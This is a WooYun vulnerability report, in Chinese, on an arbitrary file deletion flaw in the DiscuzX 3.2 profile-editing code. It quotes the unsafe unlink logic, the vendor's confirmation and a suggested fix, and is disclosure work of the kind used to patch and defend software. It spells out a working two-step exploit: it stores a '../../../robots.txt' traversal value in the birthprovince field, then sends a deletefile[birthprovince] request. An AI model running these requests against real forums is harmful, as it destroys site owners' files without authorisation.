当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065513

漏洞标题:DiscuzX 任意文件操作漏洞

相关厂商:Discuz!

漏洞作者: Map

提交时间:2014-06-19 19:10

修复时间:2014-09-17 19:12

公开时间:2014-09-17 19:12

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-19: 细节已通知厂商并且等待厂商处理中
2014-06-20: 厂商已经确认,细节仅向厂商公开
2014-06-23: 细节向第三方安全合作伙伴开放
2014-08-14: 细节向核心白帽子及相关领域专家公开
2014-08-24: 细节向普通白帽子公开
2014-09-03: 细节向实习白帽子公开
2014-09-17: 细节向公众公开

简要描述:

DiscuzX 任意文件操作漏洞

详细说明:

漏洞实际上是任意文件删除,但是由于删除的函数容易被定位,所以不方便写在简要描述或标题内。
昨天下载DiscuzX 3.2的代码,在
source/include/spacecp/spacecp_profile.php 中找到以下代码:

if($_GET['deletefile'] && is_array($_GET['deletefile'])) {
foreach($_GET['deletefile'] as $key => $value) {
if(isset($_G['cache']['profilesetting'][$key])) {
echo (getglobal('setting/attachdir').'./profile/'.$space[$key]);
@unlink(getglobal('setting/attachdir').'./profile/'.$space[$key]);
@unlink(getglobal('setting/attachdir').'./profile/'.$verifyinfo['field'][$key]);
$verifyarr[$key] = $setarr[$key] = '';
}
}
}


往上跟发现$_GET['deletefile']没有任何处理,$space[$key]来自

$space = getuserbyuid($_G['uid']);
space_merge($space, 'field_home');
space_merge($space, 'profile');


所以我们需要在$space变量中找到一个存在需要被删除的文件的位置,我用的字段是birthprovince

我们第一次在birthprovince里加上我们要删除的文件然后保存资料,下次我们提交$_GET['deletefile'][birthprovince],那么$space[birthprovince]指向的文件就会被删除。


也就是说,我们提交birthprovince为../../../robots.txt
保存完之后,数据库里的$space['birthprovice']会成为../../../robots.txt,当我们提交$_GET['deletefile'][birthprovince]的时候,会去删除$space['birthprovice']指向的文件。
操作步骤:
那么登陆后提交:
birthprovince=../../../robots.txt&profilesubmit=1&formhash=85cf7ef0
注意,85cf7ef0是你的formhash。
http://localhost/dx/home.php?mod=spacecp&ac=profile&op=base
提示保存成功
这个时候你的birthprovince就是../../../robots.txt,产生的$space['birthprovince']就是../../../robots.txt了。
接下来我们来进行参数的操作,提交:
birthprovince=../../../robots.txt&profilesubmit=1&formhash=85cf7ef0

http://localhost/study/dx/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa
OK,文件就被顺利删除了。

漏洞证明:

如上面所述。

修复方案:

检查下deletefile指向的key是不是自定义字段里允许FILES的字段。

版权声明:转载请注明来源 Map@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-20 10:24

厂商回复:

感谢您提供的信息。我们尽快给于修正。很神器的进攻思路。不过这也说明在程序的逻辑上,代码确实不够严谨。

最新状态:

暂无